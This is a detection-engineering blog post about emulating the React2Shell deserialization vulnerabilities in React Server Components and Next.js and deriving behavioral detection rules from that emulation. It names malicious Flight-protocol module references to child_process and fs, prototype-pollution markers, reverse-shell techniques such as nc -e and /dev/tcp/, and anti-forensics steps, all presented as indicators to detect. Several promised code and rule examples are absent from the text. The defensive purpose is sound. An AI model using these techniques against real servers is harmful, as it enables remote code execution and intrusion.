,

Simulating and Detecting React2Shell: A Deep Dive into CVE-2025-55182 & CVE-2025-66478

Fred Wilmot Avatar

Introduction

When critical vulnerabilities emerge in widely-deployed frameworks, security teams face an immediate challenge: how do you detect exploitation attempts when traditional signature-based approaches fall short? The recent React2Shell vulnerabilities (CVE-2025-55182 and CVE-2025-66478) affecting React Server Components and Next.js provide a perfect case study in building behavioral detection through attack emulation.

This post walks through our process of developing a comprehensive ADEL (Attack Description Language) scenario that models the complete React2Shell attack chain, from initial reconnaissance through persistence. We’ll explore the behavioral choices we made for exploit simulation, why they matter for detection engineering, and how understanding the underlying protocol leads to more effective security controls.

Understanding the Vulnerability

React2Shell is a critical remote code execution vulnerability stemming from unsafe deserialization in the React Server Components “Flight” protocol. The vulnerability allows attackers to:

  • Craft malicious HTTP requests with specially-formed RSC payloads
  • Exploit prototype pollution through __proto__ and constructor manipulation
  • Reference dangerous Node.js modules (fs, child_process) through Flight protocol module injection
  • Achieve remote code execution on the server without authentication

While this might not be a log4Shell internet level exploitation, the impact of these vulnerabilities may be more than we think and exploitable in places we don’t expect them

According to Wiz:
Wiz data indicates that 39% of cloud environments contain instances of Next.js or React in versions vulnerable to CVE-2025-55182 and/or CVE-2025-66478. Regarding Next.js, the framework itself is present in 69% of environments. Notably, 61% of those environments have public applications running Next.js, meaning that 44% of all cloud environments have publicly exposed Next.js instances (regardless of the version running).”

The Flight Protocol: Understanding Normal vs. Malicious Behavior

Before building detection rules, we needed to understand what normal React Server Components traffic looks like. The Flight protocol is a line-delimited streaming format where each row follows this pattern:

[ID]:[TYPE]:[DATA]

Normal Traffic Baseline

Legitimate RSC requests exhibit consistent patterns:

Size characteristics:

  • Typical payloads: 500 bytes to 5KB
  • Complex interactions: 5-20KB
  • Anything over 50KB warrants investigation

Structural patterns:

  • Sequential reference IDs (0, 1, 2, 3…)
  • Module references pointing to application code
  • Row types limited to expected markers (J, I, S, M, E, T)

Request patterns:

  • User agents from legitimate browsers
  • 5-30 requests per minute during normal browsing
  • Response times between 50-800ms for typical operations

Malicious Traffic Indicators

Exploitation attempts deviate from these baselines in observable ways:

Protocol violations:

  • Non-browser user agents (curl, python-requests)
  • Oversized payloads (>50KB) containing exploit code
  • Module references to Node.js core modules: :I:{“id”:”fs”}, :I:{“id”:”child_process”}
  • Prototype pollution markers: __proto__, constructor.prototype
  • Non-sequential or extremely high reference IDs

Behavioral anomalies:

  • Multiple failed requests followed by success (reconnaissance pattern)
  • Rapid sequential requests with slight variations (fuzzing)
  • Requests during off-hours or from unexpected geographic locations

Design Choices for Behavioral Emulation

Choice 1: Model Realistic Reconnaissance with Tool Diversity

Decision: Include failed exploitation attempts before success, and iterate through multiple user agents.

Rationale: Real attackers probe defenses using different tools. They send requests that trigger 500 and 400 errors as they refine payloads. Our scenario loops through three user agents (curl, python-requests, empty) during reconnaissance:

This generates 9 reconnaissance attempts total (3 steps × 3 user agents), modeling how attackers switch tools during enumeration.

Detection Opportunity: Alert on multiple RSC requests with errors from different non-browser user agents from the same source IP. This tool-switching behavior is a strong indicator of active exploitation attempts and catches reconnaissance before the main exploit succeeds.

Choice 2: Capture Flight Protocol-Specific Exploitation with Fuzzing Simulation

Decision: Include malicious module references using exact Flight protocol serialization format, and loop through all dangerous modules.

Rationale: Generic “look for child_process” rules miss context. The Flight protocol serializes module references as:

:I:{“id”:”MODULE_NAME”,”chunks”:[],”name”:”EXPORT”}

Our scenario loops through six dangerous module references:

This generates six separate exploitation attempts, simulating how attackers fuzz different module imports to find what works on the target system.

Detection Opportunity: Deep packet inspection for the :I: row type marker combined with dangerous module names provides high-fidelity detection. Additionally, detecting multiple different module reference attempts from the same source within a short timeframe reveals systematic fuzzing behavior—a strong indicator of active exploitation. Volume-based rules triggering on 3+ distinct dangerous module references in under 2 minutes have extremely high confidence.

Choice 3: Model Multiple Prototype Pollution Vectors

Decision: Include three separate exploitation techniques: __proto__, constructor, and constructor.prototype.

Rationale: Attackers use variations to evade simple pattern matching. By including multiple vectors, we:

  • Generate diverse telemetry for rule validation
  • Test detection resilience against evasion techniques
  • Model real-world attacker behavior (try multiple approaches)

Detection Opportunity: Create layered detection rules that catch any prototype pollution attempt, regardless of specific technique used.

Choice 4: Randomize Payload Sizes with Realistic Variance

Decision: Use sophisticated randomization for payload sizes between 10KB and 124KB.

Rationale: Real exploitation payloads vary in size based on:

  • Exploit technique complexity
  • Payload obfuscation methods
  • Additional malicious code embedded
  • Attacker testing of size-based WAF rules

Our approach:

This generates payloads ranging from 10KB to 124KB with random content padding, creating realistic size distributions across multiple exploitation attempts.

Detection Opportunity:

  1. Statistical anomaly detection: on payload sizes, normal RSC traffic is typically under 5KB, making these oversized requests (>10KB) highly anomalous
  2. Size variation detection: multiple requests from the same source with dramatically different sizes (e.g., 15KB, then 87KB, then 112KB) indicates systematic probing of size-based defenses
  3. Baseline deviation alerting: comparing against P95/P99 baselines for your application makes even 10KB payloads suspicious if normal traffic averages 2-3KB

Choice 5: Comprehensive Post-Exploitation Discovery with Random Selection

Decision: Model system and network enumeration immediately after successful exploitation, using randomized command selection.

Rationale: Attackers always enumerate the environment they’ve compromised, but rarely run every possible discovery command. We model realistic behavior by randomly selecting from common enumeration commands:

System discovery:

// Randomly selects from: ifconfig, ipconfig, netstat

This creates variable telemetry across different scenario runs mirroring how different attackers or automated tools may prioritize different enumeration commands.  Sometimes seeing whoami, other times hostname or uname -a can help create a large enough set of behavioral variants with the context of known systems and users, to illustrate when these commands are likely unusual.

Detection Opportunity:

  1. Single command detection: Any discovery command from Node.js parent is suspicious
  2. Timing correlation: Correlate suspicious RSC requests with immediate execution of discovery commands from the Node.js process (within 10 seconds). This correlation provides strong evidence of compromise
  3. Behavioral sequence detection: System discovery followed by network discovery within 30 seconds from same process tree indicates methodical post-exploitation enumeration
  4. Command diversity tracking: Even one discovery command from Node.js warrants investigation, but seeing multiple types (system + network) confirms active attacker enumeration

Choice 6: Diverse Reverse Shell Techniques with Systematic Enumeration

Decision: Include seven different shell spawning methods and loop through all of them.

Rationale: Attackers use various techniques based on:

  • Available tools on the target system
  • Network egress restrictions
  • Defense evasion requirements
  • Trial-and-error to find what works

Our scenario systematically tests all techniques:

This generates seven separate shell spawning attempts, modeling how attackers enumerate available techniques when some fail due to missing binaries or network restrictions.

Detection Opportunity:

  1. Single technique detection: Process monitoring for any child process spawned by Node.js matching these patterns
  2. Enumeration detection: Multiple shell spawning attempts with different techniques from the same Node.js process within minutes is extremely high-confidence indicator of compromise
  3. Failure pattern detection: Sequence of failed process starts followed by a success reveals attacker enumeration and helps identify which technique succeeded
  4. Volume-based alerting: 3+ distinct shell execution attempts from Node.js parent process within 60 seconds warrants immediate investigation

Choice 7: Cross-Platform Coverage

Decision: Model both Linux and Windows execution paths.

Rationale: React applications run on diverse infrastructure. Our scenario covers:

  • Linux: /bin/bash, /var/log/ paths
  • Windows: cmd.exe, Windows-specific paths

Detection Opportunity: Platform-specific detection rules that adapt to the operating system while maintaining behavioral consistency.

Choice 8: Include Defense Evasion Behaviors

Decision: Add log deletion and timestomping steps.

Rationale: Sophisticated attackers attempt to cover their tracks. Modeling these behaviors ensures we detect the complete attack lifecycle, not just initial compromise.

Anti-forensics techniques modeled:

  • Log deletion: /var/log/, ~/.bash_history
  • Timestomping: touch -t to modify file timestamps

Detection Opportunity: Alert on file modification or deletion of security-relevant logs from unexpected processes (Node.js). This indicates an attacker attempting to evade detection.

Validation Methodology

Technical Accuracy Validation

We validated our scenario against:

  1. Official CVE documentation – Confirmed vulnerable package names and versions
    • react-server-dom-webpack v19.0.0
    • react-server-dom-parcel v19.0.0
    • react-server-dom-turbopack v19.0.0
  2. Flight protocol specifications – Verified serialization format correctness
    • Module reference structure matches protocol specification
    • Row type markers are accurate
    • Reference ID patterns follow protocol rules
  3. Real-world exploitation patterns – Cross-referenced with security research
    • Prototype pollution techniques match documented exploits
    • Shell spawning methods align with common post-exploitation tools
    • Discovery commands reflect actual attacker tradecraft

Behavioral Realism Validation

We measured across multiple dimensions including behavioral realism, relationship accuracy, and Attack flow variance:

Attack Flow Variance

  • Reconnaissance → Exploitation → Discovery → Execution → Persistence
  • Each phase includes realistic sub-steps with appropriate timing
  • Failed attempts precede successful exploitation

Process relationship accuracy

  • Parent-child process trees are correct (node → bash/cmd)
  • All process spawning originates from compromised Node.js process
  • Cross-platform execution paths are accurate

Behavioral Realism

  • Outbound C2 connections use common ports (443)
  • HTTP methods match expected usage (POST for C2)
  • Request headers include protocol-specific markers (RSC: 1)

Advanced Detection Techniques Enabled by Scenario Design

Our sophisticated emulation approach incorporates loops, randomization, and fuzzing simulation to create accurate behavior and the necessary variants enabling detection strategies that go beyond simple signature matching.

Pattern 1: Tool-Switching Detection

Why This Works: Legitimate users maintain consistent user agents. Tool switching is a hallmark of reconnaissance and exploitation attempts.

Confidence Level: High

very few false positives outside of development/testing environments.

Pattern 2: Module Fuzzing Detection

Why This Works: Legitimate applications reference the same modules consistently. Systematically testing different dangerous modules is fuzzing behavior that only occurs during exploitation.

Confidence Level: Very High

this pattern has near-zero false positives. Normal RSC traffic never contains references to core Node.js modules.

Pattern 3: Payload Size Variance Detection

Why This Works: Normal user interactions produce consistent payload sizes (±20%). Attackers testing size-based WAF limits or including variable obfuscation create dramatic size variations.

Confidence Level: Medium-High

This may require tuning based on application behavior, but high variance (>30KB stddev) is strongly indicative of probing.

Pattern 4: Shell Technique Enumeration Detection

Why This Works: Legitimate Node.js applications don’t spawn shells, and certainly don’t try multiple different shell techniques in rapid succession. This is attacker enumeration behavior.

Confidence Level: Very High. Node.js spawning any shell is suspicious; multiple techniques is definitive compromise.

Pattern 5: Volume-Based Reconnaissance Detection

Why This Works: Normal users encountering errors either retry once or navigate away. High volumes of failed requests indicate systematic probing.

Confidence Level: High

especially when combined with non-browser user agents, high-volume requests that error out might illustrate unexpected operational behavior, and may be interesting to investigate.

Detection Opportunities by Attack Phase

Our scenario generates rich telemetry at every stage, enabling multi-layered detection strategies.

Phase 1: Initial Access

High-Fidelity Indicators:

  • Non-browser user agents (curl, python-requests) to RSC endpoints
  • Multiple user agents from same source (tool switching)
  • Content-Type: text/x-component with RSC: 1 header
  • Payload size >10KB (normal traffic typically <5KB)
  • Multiple dangerous module references in short timeframe

Medium-Fidelity Indicators:

  • Multiple failed requests (4xx, 5xx) followed by success
  • Request patterns inconsistent with application usage
  • Payload size variance (stddev > 30KB)

Phase 2: Exploitation

High-Fidelity Indicators:

  • Flight protocol module references to dangerous Node.js modules
  • Prototype pollution patterns in request body
  • Combined: :I:{“id”:”child_process”} in payload

Medium-Fidelity Indicators:

  • High reference ID counts in payload
  • Unusual nested object structures

Phase 3: Execution & Discovery

High-Fidelity Indicators:

  • Node.js process spawning bash or cmd.exe
  • System enumeration commands (whoami, id, hostname) from Node.js parent
  • Network discovery commands (ifconfig, netstat) from Node.js parent
  • Multiple shell execution attempts with different techniques

This timing correlation provides extremely high confidence because the proximity of exploitation request to enumeration commands strongly indicates compromise.

Medium-Fidelity Indicators:

  • Unusual file access patterns from Node.js process
  • Memory allocation spikes during request processing
  • Single discovery command from Node.js (requires investigation)

Phase 4: Defense Evasion

High-Fidelity Indicators:

  • Node.js process deleting log files
  • Touch command modifying timestamps (timestomping)
  • Modification of shell history files

Detection Rule Example:

Phase 5: Persistence

High-Fidelity Indicators:

  • Web shell creation (shell.php, cmd.jsp) in public directories
  • File writes to web-accessible paths from Node.js process

Detection Rule Example:

Lessons Learned for Detection Engineering

1. Protocol Understanding is Foundational

Generic pattern matching (looking for “child_process” anywhere) generates false positives. Understanding that the Flight protocol uses :I:{“id”:”MODULE”} for module references enabled precise detection with minimal noise.

But beyond single indicators, fuzzing detection reveals systematic exploitation. When we detect multiple different dangerous module references (fs, child_process, net, http) from the same source within minutes, we’re not catching random noise, we’re catching systematic testing to figure out what modules the target environment allows.

Key Takeaway: Invest time in understanding the wire protocol. Protocol-aware detection is dramatically more effective than generic string matching, and detecting patterns of variation in protocol usage reveals attacker enumeration behavior.

2. Behavioral Sequences and Volume Matter More Than Individual Events

A single instance of “whoami” execution isn’t alarming. “Whoami” executed by a Node.js process within seconds of a suspicious RSC request is highly indicative of compromise.

But multiple shell execution attempts with different techniques (bash -c, then nc -e, then /dev/tcp/) from the same Node.js process is definitive evidence of attacker enumeration systematically trying techniques until one succeeds.

Similarly, three different dangerous module references in two minutes isn’t three separate events but it’s one fuzzing campaign.

Key Takeaway: Build detection rules that correlate events across time, process trees, and technique diversity. The behavioral sequence and volume patterns tell the complete story of attacker methodology.

3. Model Failed Attempts and Reconnaissance, Not Just Successes

Many detection strategies focus only on successful exploitation. Our scenario’s reconnaissance phase (multiple failed requests with different user agents) reveals an earlier detection opportunity.

Tool switching behavior: seeing curl, then python-requests, then curl again from the same IP strongly indicates active reconnaissance even before exploitation succeeds.

Key Takeaway: Alert on reconnaissance patterns and failed attempts. Catching attackers during the probing phase prevents successful exploitation. Volume of failures combined with tool diversity provides high-confidence early warning.

4. Diversity and Randomization in Attack Vectors Strengthens Detection

By modeling seven different reverse shell techniques and looping through all of them, we ensure our detection isn’t brittle. If we only tested bash -i, we might miss attackers using /dev/tcp/ or python -c.

Similarly, payload size randomization (10KB to 124KB) ensures we test detection rules across the full size spectrum attackers might use, not just a single fixed payload size.

Randomization reveals detection blind spots: If your rules only trigger on exactly 51KB payloads but miss 15KB or 112KB payloads, you have a gap. Testing across the full range ensures comprehensive coverage.

Key Takeaway: Comprehensive emulation across technique variations and realistic randomization ensures robust detection coverage and reveals blind spots before attackers exploit them.

5. Defense Evasion and Volume Patterns Reveal Sophisticated Attackers

Basic exploitation might succeed without log deletion or timestomping. When we detect these anti-forensics behaviors, we know we’re dealing with a more capable adversary.

Similarly, systematic fuzzing (6 different module references, 7 shell techniques) indicates either automated tooling or experienced operators which is a different threat profile than opportunistic scanning.

Volume and diversity metrics indicate sophistication:

  • 1-2 attempts = opportunistic/automated scanning
  • 5+ attempts with variations = systematic exploitation
  • 10+ attempts with anti-forensics = advanced persistent threat

Key Takeaway: Layer detection across the attack lifecycle and use volume/diversity metrics to assess threat sophistication. Later-stage behaviors and systematic enumeration indicate threat severity and actor capability.

Practical Implementation Guidance

For Detection Engineers

  1. Start with protocol analysis – Understand the legitimate format before identifying anomalies
  2. Establish baselines with statistical rigor – Collect normal traffic for 24-48 hours, calculate P50/P95/P99 for key metrics (payload size, request frequency, user agent diversity)
  3. Build layered detection with volume awareness – Multiple weaker signals combined provide stronger confidence than single indicators. Example: non-browser UA (weak) + oversized payload (medium) + module fuzzing pattern (strong) = very high confidence
  4. Test with comprehensive emulation – Use scenarios like ours that include randomization, loops, and fuzzing patterns to validate detection rules across the full attack spectrum before production deployment
  5. Tune thresholds using variance metrics – Use baseline statistics and standard deviation to set meaningful alerting thresholds. If normal payload stddev is 500 bytes, alert on stddev >10KB within a session
  6. Implement multi-stage detection – Early-stage alerts (reconnaissance, tool switching) with lower severity; mid-stage alerts (exploitation, enumeration) with high severity; late-stage alerts (persistence, exfiltration) with critical severity
  7. Measure detection coverage – Track which attack phase each rule targets. Aim for at least 2-3 detection opportunities per phase

For Incident Responders

When you see alerts based on these patterns:

  1. Triage based on phase and volume – Initial access alerts (reconnaissance, single exploit attempt) require investigation; systematic exploitation (multiple module fuzzing, tool switching) indicates active targeting; later phases (enumeration, shell spawning) indicate confirmed compromise
  2. Assess attack sophistication via diversity metrics – Count distinct techniques: 1-2 attempts = opportunistic; 5+ distinct attempts = systematic; 10+ with variations = advanced threat actor
  3. Correlate across indicators – Look for the complete attack chain, not isolated events. Tool switching + module fuzzing + shell enumeration = high-confidence compromise
  4. Preserve protocol-level evidence – Flight protocol payloads in HTTP logs are critical forensic artifacts. Capture full request bodies for RSC requests during incident timeframe
  5. Check for persistence comprehensively – Even if the initial exploit was blocked, web shells may have been deployed. Search for .php/.jsp/.aspx files in public directories created within incident window
  6. Assume lateral movement based on volume – If Node.js was compromised and you see 7+ shell execution attempts, assume the attacker gained code execution. Assess what data/systems the Node.js process could access
  7. Reconstruct attacker methodology – Use timing analysis and technique diversity to understand whether facing automated tooling (rapid, mechanical) or human operator (variable timing, adaptive techniques)

For Security Architects

  1. Network segmentation – Limit Node.js application server egress to only necessary destinations
  2. Process monitoring – Deploy EDR/XDR capable of tracking process genealogy from Node.js
  3. Deep packet inspection – Deploy security controls capable of inspecting RSC payloads
  4. Logging depth – Ensure HTTP request bodies are logged (with appropriate privacy controls)
  5. Patch prioritization – React Server Components vulnerabilities warrant emergency patching

Quantifying Detection Coverage

Our enhanced scenario with loops and randomization provides measurable detection coverage across the attack lifecycle.  In addition, with the Detecteam REFLEX™ platform, we also provide detections deployable to your detection ecosystem SIEM/XDR/Data Lake.

Telemetry Generation Metrics

Event Volume Per Scenario Run:

  • Reconnaissance phase: 3 user agents × 3 attempts = 9 HTTP requests
  • Exploitation phase: 2 prototype pollution + 6 module fuzzing = 8 HTTP requests
  • Discovery phase: Random selection from 8 commands = 2-3 process executions
  • Shell enumeration: 7 shell technique attempts = 7 process spawns
  • Persistence & exfiltration: 2-4 file operations + network connections

Total: 28-31 observable events per scenario execution

This high event count ensures comprehensive telemetry for detection rule validation across all attack phases.

Detection Opportunity Matrix

Attack PhaseDetection RulesConfidence LevelEvent Count
Reconnaissance3 rules (volume, tool switch, errors)Medium-High9 events
Exploitation4 rules (module fuzz, proto pollution, size)High-Very High8 events
Discovery3 rules (process spawn, timing, commands)Very High2-3 events
Shell Access2 rules (enumeration, single spawn)Very High7 events
Persistence2 rules (web shell, file creation)High2 events
Exfiltration2 rules (data access, network)High2 events

Total: 16 distinct detection rules across 30+ observable events

Attack Technique Coverage

MITRE ATT&CK Techniques Modeled:

  • T1190 (Exploit Public-Facing Application) – 100% coverage with fuzzing
  • T1203 (Exploitation for Client Execution) – 100% coverage
  • T1059.004 (Unix Shell) – 100% coverage with 7 techniques
  • T1082 (System Information Discovery) – 100% coverage
  • T1016 (System Network Configuration Discovery) – 100% coverage
  • T1070 (Indicator Removal) – 100% coverage
  • T1505.003 (Web Shell) – 100% coverage

Technique Variants Per Category:

  • Exploitation techniques: 8 variants (2 proto + 6 modules)
  • Shell techniques: 7 variants (bash, nc, python, perl, etc.)
  • Discovery commands: 8 variants (system + network)
  • User agents: 3 variants (curl, python-requests, empty)

This diversity ensures detection rules are tested against realistic attack variation, not just single proof-of-concept implementations.

Building effective behavioral detection for modern web framework vulnerabilities requires more than CVE awareness.  it demands deep understanding of underlying protocols and behaviors, context from your environment, validated realistic attack emulation, and tested multi-layered detection strategies.

Our React2Shell Adel scenario demonstrates that thorough behavioral modeling creates detection opportunities at every attack phase:

  • 7 high-fidelity detection points across the attack chain
  • Multiple correlation opportunities for increased confidence
  • Cross-platform coverage ensuring comprehensive protection
  • Protocol-specific indicators minimizing false positives

The key insight is that deserialization vulnerabilities aren’t just about the exploit payload.  They create observable behavioral patterns throughout the entire attack lifecycle. By modeling these behaviors comprehensively, we transform a critical RCE vulnerability into a highly detectable threat.

For security teams facing React2Shell exposure:

  1. Patch immediately (versions 19.0.1+ for React, appropriate Next.js versions)
  2. Deploy detection rules based on behavioral patterns outlined here
  3. Review logs retroactively for indicators of prior compromise
  4. Test detection efficacy using emulation scenarios
  5. Monitor for the complete attack chain, not just exploitation

As this is evolving in the wild, we’ll continue to update both our scenarios as well as the detection logic for behaviors used in exploitation as more information becomes available. 

References

  • “https://www.sonatype.com/blog/react2shell-rce-vulnerabilities-require-immediate-attention”
  • “https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components”
  • “https://github.com/facebook/react/security/advisories/GHSA-fv66-9v8q-g76r”
  • “https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp”
  • “https://www.wiz.io/blog/critical-vulnerability-in-react-cve-2025-55182”
  • “https://react2shell.com/”
  • “https://github.com/ejpir/CVE-2025-55182-research”